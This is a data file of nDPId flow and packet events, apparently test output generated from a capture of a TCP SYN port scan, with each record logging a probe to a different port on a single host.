+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1038,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsZG4AADUGrwSsEAAIQA2GNIzSCV\/dUoMYAAAAAGACCAAnMAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1048,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1039,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1039,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsqyIAACsGclCsEAAIQA2GNIzSDfzdUoMYAAAAAGACEAAakwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1049,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":89,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsXvEAADYGs4GsEAAIQA2GNIzSAFndUoMYAAAAAGACDAAsNgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1050,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1041,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1041,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsT3AAACcG0gKsEAAIQA2GNIzSIqndUoMYAAAAAGACEAAF5gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1051,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1042,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1042,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsjsMAADcGgq+sEAAIQA2GNIzSG8LdUoMYAAAAAGACEAAMzQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1052,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1043,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1043,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAs+kwAACcGJyasEAAIQA2GNIzSH5fdUoMYAAAAAGACEAAI+AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1053,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1044,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1044,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAs9w4AADIGH2SsEAAIQA2GNIzSJXrdUoMYAAAAAGACDAAHFQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1054,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1045,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1045,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsYMkAADoGramsEAAIQA2GNIzSBEvdUoMYAAAAAGACDAAoRAAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1055,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAseVsAACcGqBesEAAIQA2GNIzShw3dUoMYAAAAAGACEAChgQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1056,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1047,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1056,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1047,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsAugAACkGHIusEAAIQA2GNIzSE6bdUoMYAAAAAGACCAAc6QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1057,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1048,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1057,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1048,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsY\/8AADoGqnOsEAAIQA2GNIzSCo7dUoMYAAAAAGACDAAiAQAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1058,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1049,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1049,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsrsYAAC4Ga6ysEAAIQA2GNIzTgA\/dU4MZAAAAAGACDACsfAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1059,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1050,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1059,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1050,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsvEIAADEGWzCsEAAIQA2GNIzTBaPdU4MZAAAAAGACCAAq6QAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1060,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1051,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1060,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1051,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAs7Q8AAC0GLmOsEAAIQA2GNIzTTVndU4MZAAAAAGACCADjMgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1061,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1052,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5802,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1052,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsVA8AACgGzGOsEAAIQA2GNIzTFqrdU4MZAAAAAGACBAAd4gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1062,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1053,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1053,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsbTMAADEGqj+sEAAIQA2GNIzTI3ndU4MZAAAAAGACCAANEwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1063,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1054,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1063,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1054,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAspFIAADsGaSCsEAAIQA2GNIzTBHHdU4MZAAAAAGACEAAkGwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1064,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1055,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1064,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1055,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsG4AAACwGAPOsEAAIQA2GNIzTB2zdU4MZAAAAAGACBAAtIAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1065,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1056,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1065,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1056,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsIdAAAC0G+aKsEAAIQA2GNIzTEVvdU4MZAAAAAGACCAAfMQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1066,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1057,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1066,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1057,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/2AAACcGIhKsEAAIQA2GNIzTxUTdU4MZAAAAAGACEABjRwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1067,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1067,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsRwMAACYG22+sEAAIQA2GNIzTCizdU4MZAAAAAGACDAAiYAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1068,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1059,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1068,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1059,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsxZYAADcGS9ysEAAIQA2GNIzTBCPdU4MZAAAAAGACEAAkaQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1069,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1060,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1069,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1060,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsUyoAACsGykisEAAIQA2GNIzTKXjdU4MZAAAAAGACEAD\/EwAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1070,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1061,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1070,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1061,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsPPsAADQG13esEAAIQA2GNIzTLuDdU4MZAAAAAGACBAAFrAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1071,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1062,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":31038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
